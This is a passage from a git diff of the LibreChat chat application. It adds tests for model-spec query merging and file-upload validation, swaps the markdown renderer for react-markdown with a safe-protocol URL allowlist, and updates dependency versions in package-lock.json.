injecting null display fields', () => { + const querySettings: TPreset = { + agent_id: 'agent_123', + endpoint: EModelEndpoint.agents, + }; + + const result = mergeQuerySettingsWithSpec(undefined, querySettings); + + expect(result.agent_id).toBe('agent_123'); + expect(result.endpoint).toBe(EModelEndpoint.agents); + expect(result).not.toHaveProperty('spec'); + expect(result).not.toHaveProperty('iconURL'); + expect(result).not.toHaveProperty('modelLabel'); + expect(result).not.toHaveProperty('greeting'); + }); + }); + + describe('when querySettings is empty', () => { + it('still clears spec display fields (no query params is not an explicit spec)', () => { + const result = mergeQuerySettingsWithSpec(specPreset, {} as TPreset); + + expect(result.spec).toBeNull(); + expect(result.iconURL).toBeNull(); + expect(result.modelLabel).toBeNull(); + expect(result.greeting).toBeUndefined(); + expect(result.endpoint).toBe(EModelEndpoint.openAI); + expect(result.model).toBe('gpt-4'); + expect(result.temperature).toBe(0.7); + }); + }); + + describe('query settings override spec values', () => { + it('overrides endpoint and model from spec', () => { + const querySettings: TPreset = { + endpoint: EModelEndpoint.anthropic, + model: 'claude-sonnet-4-20250514', + }; + + const result = mergeQuerySettingsWithSpec(specPreset, querySettings); + + expect(result.endpoint).toBe(EModelEndpoint.anthropic); + expect(result.model).toBe('claude-sonnet-4-20250514'); + expect(result.temperature).toBe(0.7); + expect(result.spec).toBeNull(); + }); + }); +}); + +describe('specDisplayFieldReset', () => { + it('contains all spec display fields that need clearing', () => { + expect(specDisplayFieldReset).toEqual({ + spec: null, + iconURL: null, + modelLabel: null, + greeting: undefined, + }); + }); + + it('has exactly 4 fields', () => { + expect(Object.keys(specDisplayFieldReset)).toHaveLength(4); + }); +}); diff --git a/client/src/utils/__tests__/validateFiles.spec.ts b/client/src/utils/__tests__/validateFiles.spec.ts new file mode 100644 index 0000000000..6d690bf62a --- /dev/null +++ b/client/src/utils/__tests__/validateFiles.spec.ts @@ -0,0 +1,172 @@ +import { megabyte, fileConfig as defaultFileConfig } from 'librechat-data-provider'; +import type { EndpointFileConfig, FileConfig } from 'librechat-data-provider'; +import type { ExtendedFile } from '~/common'; +import { validateFiles } from '../files'; + +const supportedMimeTypes = defaultFileConfig.endpoints.default.supportedMimeTypes; + +function makeEndpointConfig(overrides: Partial = {}): EndpointFileConfig { + return { + fileLimit: 10, + fileSizeLimit: 25 * megabyte, + totalSizeLimit: 100 * megabyte, + supportedMimeTypes, + disabled: false, + ...overrides, + }; +} + +function makeFile(name: string, type: string, size: number): File { + const content = new ArrayBuffer(size); + return new File([content], name, { type }); +} + +function makeExtendedFile(overrides: Partial = {}): ExtendedFile { + return { + file_id: 'ext-1', + size: 1024, + progress: 1, + type: 'application/pdf', + ...overrides, + }; +} + +describe('validateFiles', () => { + let setError: jest.Mock; + let files: Map; + let endpointFileConfig: EndpointFileConfig; + const fileConfig: FileConfig | null = null; + + beforeEach(() => { + setError = jest.fn(); + files = new Map(); + endpointFileConfig = makeEndpointConfig(); + }); + + it('returns true when all checks pass', () => { + const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(true); + expect(setError).not.toHaveBeenCalled(); + }); + + it('rejects when endpoint is disabled', () => { + endpointFileConfig = makeEndpointConfig({ disabled: true }); + const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('com_ui_attach_error_disabled'); + }); + + it('rejects empty files (zero bytes)', () => { + const fileList = [makeFile('empty.pdf', 'application/pdf', 0)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('com_error_files_empty'); + }); + + it('rejects when fileLimit would be exceeded', () => { + endpointFileConfig = makeEndpointConfig({ fileLimit: 3 }); + files = new Map([ + ['f1', makeExtendedFile({ file_id: 'f1', filename: 'one.pdf', size: 2048 })], + ['f2', makeExtendedFile({ file_id: 'f2', filename: 'two.pdf', size: 3072 })], + ]); + const fileList = [ + makeFile('a.pdf', 'application/pdf', 1024), + makeFile('b.pdf', 'application/pdf', 2048), + ]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('File limit reached: 3 files'); + }); + + it('allows upload when exactly at fileLimit boundary', () => { + endpointFileConfig = makeEndpointConfig({ fileLimit: 3 }); + files = new Map([ + ['f1', makeExtendedFile({ file_id: 'f1', filename: 'one.pdf', size: 2048 })], + ['f2', makeExtendedFile({ file_id: 'f2', filename: 'two.pdf', size: 3072 })], + ]); + const fileList = [makeFile('a.pdf', 'application/pdf', 1024)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(true); + }); + + it('rejects unsupported MIME type', () => { + const fileList = [makeFile('data.xyz', 'application/x-unknown', 1024)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('Unsupported file type: application/x-unknown'); + }); + + it('rejects when file size equals fileSizeLimit (>= comparison)', () => { + const limit = 5 * megabyte; + endpointFileConfig = makeEndpointConfig({ fileSizeLimit: limit }); + const fileList = [makeFile('exact.pdf', 'application/pdf', limit)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith(`File size limit exceeded: ${limit / megabyte} MB`); + }); + + it('allows file just under fileSizeLimit', () => { + const limit = 5 * megabyte; + endpointFileConfig = makeEndpointConfig({ fileSizeLimit: limit }); + const fileList = [makeFile('under.pdf', 'application/pdf', limit - 1)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(true); + }); + + it('rejects when totalSizeLimit would be exceeded', () => { + const limit = 10 * megabyte; + endpointFileConfig = makeEndpointConfig({ totalSizeLimit: limit }); + files = new Map([['f1', makeExtendedFile({ file_id: 'f1', size: 6 * megabyte })]]); + const fileList = [makeFile('big.pdf', 'application/pdf', 5 * megabyte)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith(`Total file size limit exceeded: ${limit / megabyte} MB`); + }); + + it('allows when totalSizeLimit is exactly met', () => { + const limit = 10 * megabyte; + endpointFileConfig = makeEndpointConfig({ totalSizeLimit: limit }); + files = new Map([['f1', makeExtendedFile({ file_id: 'f1', size: 5 * megabyte })]]); + const fileList = [makeFile('fits.pdf', 'application/pdf', 5 * megabyte)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(true); + }); + + it('rejects duplicate files', () => { + files = new Map([ + [ + 'f1', + makeExtendedFile({ + file_id: 'f1', + file: makeFile('doc.pdf', 'application/pdf', 1024), + filename: 'doc.pdf', + size: 1024, + type: 'application/pdf', + }), + ], + ]); + const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)]; + const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(result).toBe(false); + expect(setError).toHaveBeenCalledWith('com_error_files_dupe'); + }); + + it('enforces check ordering: disabled before fileLimit', () => { + endpointFileConfig = makeEndpointConfig({ disabled: true, fileLimit: 1 }); + files = new Map([['f1', makeExtendedFile({ file_id: 'f1', filename: 'existing.pdf' })]]); + const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)]; + validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(setError).toHaveBeenCalledWith('com_ui_attach_error_disabled'); + }); + + it('enforces check ordering: fileLimit before fileSizeLimit', () => { + const limit = 1; + endpointFileConfig = makeEndpointConfig({ fileLimit: 1, fileSizeLimit: limit }); + files = new Map([['f1', makeExtendedFile({ file_id: 'f1', filename: 'existing.pdf' })]]); + const fileList = [makeFile('huge.pdf', 'application/pdf', limit)]; + validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig }); + expect(setError).toHaveBeenCalledWith('File limit reached: 1 files'); + }); +}); diff --git a/client/src/utils/artifacts.ts b/client/src/utils/artifacts.ts index 13f3a23b47..e862d18a40 100644 --- a/client/src/utils/artifacts.ts +++ b/client/src/utils/artifacts.ts @@ -108,7 +108,9 @@ const mermaidDependencies = { }; const markdownDependencies = { - 'marked-react': '^2.0.0', + 'remark-gfm': '^4.0.0', + 'remark-breaks': '^4.0.0', + 'react-markdown': '^9.0.1', }; const dependenciesMap: Record< diff --git a/client/src/utils/endpoints.ts b/client/src/utils/endpoints.ts index 33aa7a8525..a27f71b8e9 100644 --- a/client/src/utils/endpoints.ts +++ b/client/src/utils/endpoints.ts @@ -311,6 +311,30 @@ export function getModelSpecPreset(modelSpec?: t.TModelSpec) { }; } +/** Fields set by a model spec that should be cleared when switching to a non-spec conversation. */ +export const specDisplayFieldReset = { + spec: null as string | null, + iconURL: null as string | null, + modelLabel: null as string | null, + greeting: undefined as string | undefined, +}; + +/** + * Merges a spec preset base with URL query settings, clearing spec display fields + * when the query doesn't explicitly set a spec. Prevents spec contamination on + * agent/assistant share links. + */ +export function mergeQuerySettingsWithSpec( + specPreset: t.TPreset | undefined, + querySettings: t.TPreset, +): t.TPreset { + return { + ...specPreset, + ...querySettings, + ...(specPreset != null && querySettings.spec == null ? specDisplayFieldReset : {}), + }; +} + /** Gets the default spec iconURL by order or definition. * * First, the admin defined default, then last selected spec, followed by first spec diff --git a/client/src/utils/files.ts b/client/src/utils/files.ts index b4d362d456..be81a31b79 100644 --- a/client/src/utils/files.ts +++ b/client/src/utils/files.ts @@ -251,7 +251,7 @@ export const validateFiles = ({ const currentTotalSize = existingFiles.reduce((total, file) => total + file.size, 0); if (fileLimit && fileList.length + files.size > fileLimit) { - setError(`You can only upload up to ${fileLimit} files at a time.`); + setError(`File limit reached: ${fileLimit} files`); return false; } @@ -282,19 +282,18 @@ export const validateFiles = ({ } if (!checkType(originalFile.type, mimeTypesToCheck)) { - console.log(originalFile); - setError('Currently, unsupported file type: ' + originalFile.type); + setError(`Unsupported file type: ${originalFile.type}`); return false; } if (fileSizeLimit && originalFile.size >= fileSizeLimit) { - setError(`File size exceeds ${fileSizeLimit / megabyte} MB.`); + setError(`File size limit exceeded: ${fileSizeLimit / megabyte} MB`); return false; } } if (totalSizeLimit && currentTotalSize + incomingTotalSize > totalSizeLimit) { - setError(`The total size of the files cannot exceed ${totalSizeLimit / megabyte} MB.`); + setError(`Total file size limit exceeded: ${totalSizeLimit / megabyte} MB`); return false; } diff --git a/client/src/utils/markdown.ts b/client/src/utils/markdown.ts index 12556c1a24..24d5105863 100644 --- a/client/src/utils/markdown.ts +++ b/client/src/utils/markdown.ts @@ -1,23 +1,70 @@ import dedent from 'dedent'; -const markdownRenderer = dedent(`import React, { useEffect, useState } from 'react'; -import Markdown from 'marked-react'; +const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']); + +/** + * Allowlist-based URL validator for markdown artifact rendering. + * Mirrored verbatim in the markdownRenderer template string below — + * any logic change MUST be applied to both copies. + */ +export const isSafeUrl = (url: string): boolean => { + const trimmed = url.trim(); + if (!trimmed) { + return false; + } + if (trimmed.startsWith('/') || trimmed.startsWith('#') || trimmed.startsWith('.')) { + return true; + } + try { + return SAFE_PROTOCOLS.has(new URL(trimmed).protocol); + } catch { + return false; + } +}; + +const markdownRenderer = dedent(`import React from 'react'; +import remarkGfm from 'remark-gfm'; +import remarkBreaks from 'remark-breaks'; +import ReactMarkdown from 'react-markdown'; interface MarkdownRendererProps { content: string; } +/** Mirror of the exported isSafeUrl in markdown.ts — keep in sync. */ +const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']); + +const isSafeUrl = (url: string): boolean => { + const trimmed = url.trim(); + if (!trimmed) return false; + if (trimmed.startsWith('/') || trimmed.startsWith('#') || trimmed.startsWith('.')) return true; + try { + return SAFE_PROTOCOLS.has(new URL(trimmed).protocol); + } catch { + return false; + } +}; + +const remarkPlugins = [remarkGfm, remarkBreaks]; +const urlTransform = (url: string) => (isSafeUrl(url) ? url : null); + const MarkdownRenderer: React.FC = ({ content }) => { return (
- {content} + + {content} +
); }; diff --git a/package-lock.json b/package-lock.json index a2db2df389..45f737ad8f 100644 --- a/package-lock.json +++ b/package-lock.json @@ -59,7 +59,7 @@ "@google/genai": "^1.19.0", "@keyv/redis": "^4.3.3", "@langchain/core": "^0.3.80", - "@librechat/agents": "^3.1.55", + "@librechat/agents": "^3.1.56", "@librechat/api": "*", "@librechat/data-schemas": "*", "@microsoft/microsoft-graph-client": "^3.0.7", @@ -82,7 +82,7 @@ "express-rate-limit": "^8.3.0", "express-session": "^1.18.2", "express-static-gzip": "^2.2.0", - "file-type": "^18.7.0", + "file-type": "^21.3.2", "firebase": "^11.0.2", "form-data": "^4.0.4", "handlebars": "^4.7.7", @@ -124,7 +124,7 @@ "sharp": "^0.33.5", "traverse": "^0.6.7", "ua-parser-js": "^1.0.36", - "undici": "^7.18.2", + "undici": "^7.24.1", "winston": "^3.11.0", "winston-daily-rotate-file": "^5.0.0", "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz", @@ -270,6 +270,24 @@ "node": ">= 0.8.0" } }, + "api/node_modules/file-type": { + "version": "21.3.2", + "resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.2.tgz", + "integrity": "sha512-DLkUvGwep3poOV2wpzbHCOnSKGk1LzyXTv+aHFgN2VFl96wnp8YA9YjO2qPzg5PuL8q/SW9Pdi6WTkYOIh995w==", + "license": "MIT", + "dependencies": { + "@tokenizer/inflate": "^0.4.1", + "strtok3": "^10.3.4", + "token-types": "^6.1.1", + "uint8array-extras": "^1.4.0" + }, + "engines": { + "node": ">=20" + }, + "funding": { + "url": "https://github.com/sindresorhus/file-type?sponsor=1" + } + }, "api/node_modules/jose": { "version": "6.1.3", "resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz", @@ -348,6 +366,40 @@ "@img/sharp-win32-x64": "0.33.5" } }, + "api/node_modules/strtok3": { + "version": "10.3.4", + "resolved": "https://registry.npmjs.org/strtok3/-/strtok3-10.3.4.tgz", + "integrity": "sha512-KIy5nylvC5le1OdaaoCJ07L+8iQzJHGH6pWDuzS+d07Cu7n1MZ2x26P8ZKIWfbK02+XIL8Mp4RkWeqdUCrDMfg==", + "license": "MIT", + "dependencies": { + "@tokenizer/token": "^0.3.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, + "api/node_modules/token-types": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz", + "integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==", + "license": "MIT", + "dependencies": { + "@borewit/text-codec": "^0.2.1", + "@tokenizer/token": "^0.3.0", + "ieee754": "^1.2.1" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, "api/node_modules/winston-daily-rotate-file": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/winston-daily-rotate-file/-/winston-daily-rotate-file-5.0.0.tgz", @@ -7286,6 +7338,16 @@ "dev": true, "license": "MIT" }, + "node_modules/@borewit/text-codec": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/@borewit/text-codec/-/text-codec-0.2.2.tgz", + "integrity": "sha512-DDaRehssg1aNrH4+2hnj1B7vnUGEjU6OIlyRdkMd0aUdIUvKXrJfXsy8LVtXAy7DRvYVluWbMspsRhz2lcW0mQ==", + "license": "MIT", + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, "node_modules/@braintree/sanitize-url": { "version": "7.1.1", "resolved": "https://registry.npmjs.org/@braintree/sanitize-url/-/sanitize-url-7.1.1.tgz", @@ -12262,9 +12324,9 @@ } }, "node_modules/@librechat/agents": { - "version": "3.1.55", - "resolved": "https://registry.npmjs.org/@librechat/agents/-/agents-3.1.55.tgz", - "integrity": "sha512-impxeKpCDlPkAVQFWnA6u6xkxDSBR/+H8uYq7rZomBeu0rUh/OhJLiI1fAwPhKXP33udNtHA8GyDi0QJj78R9w==", + "version": "3.1.56", + "resolved": "https://registry.npmjs.org/@librechat/agents/-/agents-3.1.56.tgz", + "integrity": "sha512-HJJwRnLM4XKpTWB4/wPDJR+iegyKBVUwqj7A8QHqzEcHzjKJDTr3wBPxZVH1tagGr6/mbbnErOJ14cH1OSNmpA==", "license": "MIT", "dependencies": { "@anthropic-ai/sdk": "^0.73.0", @@ -12285,6 +12347,7 @@ "@langfuse/tracing": "^4.3.0", "@opentelemetry/sdk-node": "^0.207.0", "@scarf/scarf": "^1.4.0", + "ai-tokenizer": "^1.0.6", "axios": "^1.13.5", "cheerio": "^1.0.0", "dotenv": "^16.4.7", @@ -20799,6 +20862,41 @@ "@testing-library/dom": ">=7.21.4" } }, + "node_modules/@tokenizer/inflate": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/@tokenizer/inflate/-/inflate-0.4.1.tgz", + "integrity": "sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA==", + "license": "MIT", + "dependencies": { + "debug": "^4.4.3", + "token-types": "^6.1.1" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, + "node_modules/@tokenizer/inflate/node_modules/token-types": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz", + "integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==", + "license": "MIT", + "dependencies": { + "@borewit/text-codec": "^0.2.1", + "@tokenizer/token": "^0.3.0", + "ieee754": "^1.2.1" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/Borewit" + } + }, "node_modules/@tokenizer/token": { "version": "0.3.0", "resolved": "https://registry.npmjs.org/@tokenizer/token/-/token-0.3.0.tgz", @@ -27513,22 +27611,6 @@ "moment": "^2.29.1" } }, - "node_modules/file-type": { - "version": "18.7.0", - "resolved": "https://registry.npmjs.org/file-type/-/file-type-18.7.0.tgz", - "integrity": "sha512-ihHtXRzXEziMrQ56VSgU7wkxh55iNchFkosu7Y9/S+tXHdKyrGjVK0ujbqNnsxzea+78MaLhN6PGmfYSAv1ACw==", - "dependencies": { - "readable-web-to-node-stream": "^3.0.2", - "strtok3": "^7.0.0", - "token-types": "^5.0.1" - }, - "engines": { - "node": ">=14.16" - }, - "funding": { - "url": "https://github.com/sindresorhus/file-type?sponsor=1" - } - }, "node_modules/filelist": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.6.tgz", @@ -28817,9 +28899,9 @@ "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==" }, "node_modules/hono": { - "version": "4.12.5", - "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.5.tgz", - "integrity": "sha512-3qq+FUBtlTHhtYxbxheZgY8NIFnkkC/MR8u5TTsr7YZ3wixryQ3cCwn3iZbg8p8B88iDBBAYSfZDS75t8MN7Vg==", + "version": "4.12.7", + "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.7.tgz", + "integrity": "sha512-jq9l1DM0zVIvsm3lv9Nw9nlJnMNPOcAtsbsgiUhWcFzPE99Gvo6yRTlszSLLYacMeQ6quHD6hMfId8crVHvexw==", "license": "MIT", "engines": { "node": ">=16.9.0" @@ -35702,18 +35784,6 @@ "node-readable-to-web-readable-stream": "^0.4.2" } }, - "node_modules/peek-readable": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/peek-readable/-/peek-readable-5.0.0.tgz", - "integrity": "sha512-YtCKvLUOvwtMGmrniQPdO7MwPjgkFBtFIrmfSbYmYuq3tKDV/mcfAhBth1+C3ru7uXIZasc/pHnb+YDYNkkj4A==", - "engines": { - "node": ">=14.16" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/Borewit" - } - }, "node_modules/pend": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", @@ -38519,21 +38589,6 @@ "node": ">= 6" } }, - "node_modules/readable-web-to-node-stream": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/readable-web-to-node-stream/-/readable-web-to-node-stream-3.0.2.tgz", - "integrity": "sha512-ePeK6cc1EcKLEhJFt/AebMCLL+GgSKhuygrZ/GLaKZYEecIgIECf4UaUuaByiGtzckwR4ain9VzUh95T1exYGw==", - "dependencies": { - "readable-stream": "^3.6.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/Borewit" - } - }, "node_modules/readdirp": { "version": "3.6.0", "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", @@ -40920,22 +40975,6 @@ ], "license": "MIT" }, - "node_modules/strtok3": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/strtok3/-/strtok3-7.0.0.tgz", - "integrity": "sha512-pQ+V+nYQdC5H3Q7qBZAz/MO6lwGhoC2gOAjuouGf/VO0m7vQRh8QNMl2Uf6SwAtzZ9bOw3UIeBukEGNJl5dtXQ==", - "dependencies": { - "@tokenizer/token": "^0.3.0", - "peek-readable": "^5.0.0" - }, - "engines": { - "node": ">=14.16" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/Borewit" - } - }, "node_modules/style-inject": { "version": "0.3.0", "resolved": "https://registry.npmjs.org/style-inject/-/style-inject-0.3.0.tgz", @@ -41640,22 +41679,6 @@ "node": ">=0.6" } }, - "node_modules/token-types": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/token-types/-/token-types-5.0.1.tgz", - "integrity": "sha512-Y2fmSnZjQdDb9W4w4r1tswlMHylzWIeOKpx0aZH9BgGtACHhrk3OkT52AzwcuqTRBZtvvnTjDBh8eynMulu8Vg==", - "dependencies": { - "@tokenizer/token": "^0.3.0", - "ieee754": "^1.2.1" - }, - "engines": { - "node": ">=14.16" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/Borewit" - } - }, "node_modules/touch": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz", @@ -42206,6 +42229,18 @@ "resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz", "integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA==" }, + "node_modules/uint8array-extras": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/uint8array-extras/-/uint8array-extras-1.5.0.tgz", + "integrity": "sha512-rvKSBiC5zqCCiDZ9kAOszZcDvdAHwwIKJG33Ykj43OKcWsnmcBRL09YTU4nOeHZ8Y2a7l1MgTd08SBe9A8Qj6A==", + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/unbox-primitive": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz", @@ -42238,9 +42273,9 @@ "license": "MIT" }, "node_modules/undici": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/undici/-/undici-7.20.0.tgz", - "integrity": "sha512-MJZrkjyd7DeC+uPZh+5/YaMDxFiiEEaDgbUSVMXayofAkDWF1088CDo+2RPg7B1BuS1qf1vgNE7xqwPxE0DuSQ==", + "version": "7.24.1", + "resolved": "https://registry.npmjs.org/undici/-/undici-7.24.1.tgz", + "integrity": "sha512-5xoBibbmnjlcR3jdqtY2Lnx7WbrD/tHlT01TmvqZUFVc9Q1w4+j5hbnapTqbcXITMH1ovjq/W7BkqBilHiVAaA==", "license": "MIT", "engines": { "node": ">=20.18.1" @@ -44097,9 +44132,9 @@ } }, "node_modules/yauzl": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.0.tgz", - "integrity": "sha512-Ow9nuGZE+qp1u4JIPvg+uCiUr7xGQWdff7JQSk5VGYTAZMDe2q8lxJ10ygv10qmSj031Ty/6FNJpLO4o1Sgc+w==", + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.1.tgz", + "integrity": "sha512-k1isifdbpNSFEHFJ1ZY4YDewv0IH9FR61lDetaRMD3j2ae3bIXGV+7c+LHCqtQGofSd8PIyV4X6+dHMAnSr60A==", "dev": true, "license": "MIT", "dependencies": { @@ -44205,7 +44240,7 @@ "@google/genai": "^1.19.0", "@keyv/redis": "^4.3.3", "@langchain/core": "^0.3.80", - "@librechat/agents": "^3.1.55", + "@librechat/agents": "^3.1.56", "@librechat/data-schemas": "*", "@modelcontextprotocol/sdk": "^1.27.1", "@smithy/node-http-handler": "^4.4.5", @@ -44232,7 +44267,7 @@ "node-fetch": "2.7.0", "pdfjs-dist": "^5.4.624", "rate-limit-redis": "^4.2.0", - "undici": "^7.18.2", + "undici": "^7.24.1", "zod": "^3.22.4" } }, diff --git a/packages/api/package.json b/packages/api/package.json index 966447c51b..b3b40c79a2 100644 --- a/packages/api/package.json +++ b/packages/api/package.json @@ -90,7 +90,7 @@ "@google/genai": "^1.19.0", "@keyv/redis": "^4.3.3", "@langchain/core": "^0.3.80", - "@librechat/agents": "^3.1.55", + "@librechat/agents": "^3.1.56", "@librechat/data-schemas": "*", "@modelcontextprotocol/sdk": "^1.27.1", "@smithy/node-http-handler": "^4.4.5", @@ -117,7 +117,7 @@ "node-fetch": "2.7.0", "pdfjs-dist": "^5.4.624", "rate-limit-redis": "^4.2.0", - "undici": "^7.18.2", + "undici": "^7.24.1", "zod": "^3.22.4" } } diff --git a/packages/api/src/agents/edges.spec.ts b/packages/api/src/agents/edges.spec.ts index 1b30a202d0..b23f00f63f 100644 --- a/packages/api/src/agents/edges.spec.ts +++ b/packages/api/src/agents/edges.spec.ts @@ -1,5 +1,11 @@ import type { GraphEdge } from 'librechat-data-provider'; -import { getEdgeKey, getEdgeParticipants, filterOrphanedEdges, createEdgeCollector } from './edges'; +import { + getEdgeKey, + getEdgeParticipants, + collectEdgeAgentIds, + filterOrphanedEdges, + createEdgeCollector, +} from './edges'; describe('edges utilities', () => { describe('getEdgeKey', () => { @@ -70,6 +76,49 @@ describe('edges utilities', () => { }); }); + describe('collectEdgeAgentIds', () => { + it('should return empty set for undefined input', () => { + expect(collectEdgeAgentIds(undefined)).toEqual(new Set()); + }); + + it('should return empty set for empty array', () => { + expect(collectEdgeAgentIds([])).toEqual(new Set()); + }); + + it('should collect IDs from simple string from/to', () => { + const edges: GraphEdge[] = [{ from: 'agent_a', to: 'agent_b', edgeType: 'handoff' }]; + expect(collectEdgeAgentIds(edges)).toEqual(new Set(['agent_a', 'agent_b'])); + }); + + it('should collect IDs from array from/to values', () => { + const edges: GraphEdge[] = [ + { from: ['agent_a', 'agent_b'], to: ['agent_c', 'agent_d'], edgeType: 'handoff' }, + ]; + expect(collectEdgeAgentIds(edges)).toEqual( + new Set(['agent_a', 'agent_b', 'agent_c', 'agent_d']), + ); + }); + + it('should deduplicate IDs across edges', () => { + const edges: GraphEdge[] = [ + { from: 'agent_a', to: 'agent_b', edgeType: 'handoff' }, + { from: 'agent_b', to: 'agent_c', edgeType: 'handoff' }, + { from: 'agent_a', to: 'agent_c', edgeType: 'direct' }, + ]; + expect(collectEdgeAgentIds(edges)).toEqual(new Set(['agent_a', 'agent_b', 'agent_c'])); + }); + + it('should handle mixed scalar and array edges', () => { + const edges: GraphEdge[] = [ + { from: 'agent_a', to: ['agent_b', 'agent_c'], edgeType: 'handoff' }, + { from: ['agent_c', 'agent_d'], to: 'agent_e', edgeType: 'direct' }, + ]; + expect(collectEdgeAgentIds(edges)).toEqual( + new Set(['agent_a', 'agent_b', 'agent_c', 'agent_d', 'agent_e']), + ); + }); + }); + describe('filterOrphanedEdges', () => { const edges: GraphEdge[] = [ { from: 'agent_a', to: 'agent_b', edgeType: 'handoff' }, diff --git a/packages/api/src/agents/edges.ts b/packages/api/src/agents/edges.ts index 4d2883d165..9a36105b74 100644 --- a/packages/api/src/agents/edges.ts +++ b/packages/api/src/agents/edges.ts @@ -43,6 +43,20 @@ export function filterOrphanedEdges(edges: GraphEdge[], skippedAgentIds: Set { + const ids = new Set(); + if (!edges || edges.length === 0) { + return ids; + } + for (const edge of edges) { + for (const id of getEdgeParticipants(edge)) { + ids.add(id); + } + } + return ids; +} + /** * Result of discovering and aggregating edges from connected agents. */ diff --git a/packages/api/src/agents/initialize.ts b/packages/api/src/agents/initialize.ts index af604beb81..d5bfca5aba 100644 --- a/packages/api/src/agents/initialize.ts +++ b/packages/api/src/agents/initialize.ts @@ -31,6 +31,7 @@ import { filterFilesByEndpointConfig } from '~/files'; import { generateArtifactsPrompt } from '~/prompts'; import { getProviderConfig } from '~/endpoints'; import { primeResources } from './resources'; +import type { TFilterFilesByAgentAccess } from './resources'; /** * Extended agent type with additional fields needed after initialization @@ -52,6 +53,8 @@ export type InitializedAgent = Agent & { toolDefinitions?: LCTool[]; /** Precomputed flag indicating if any tools have defer_loading enabled (for efficient runtime checks) */ hasDeferredTools?: boolean; + /** Whether the actions capability is enabled (resolved during tool 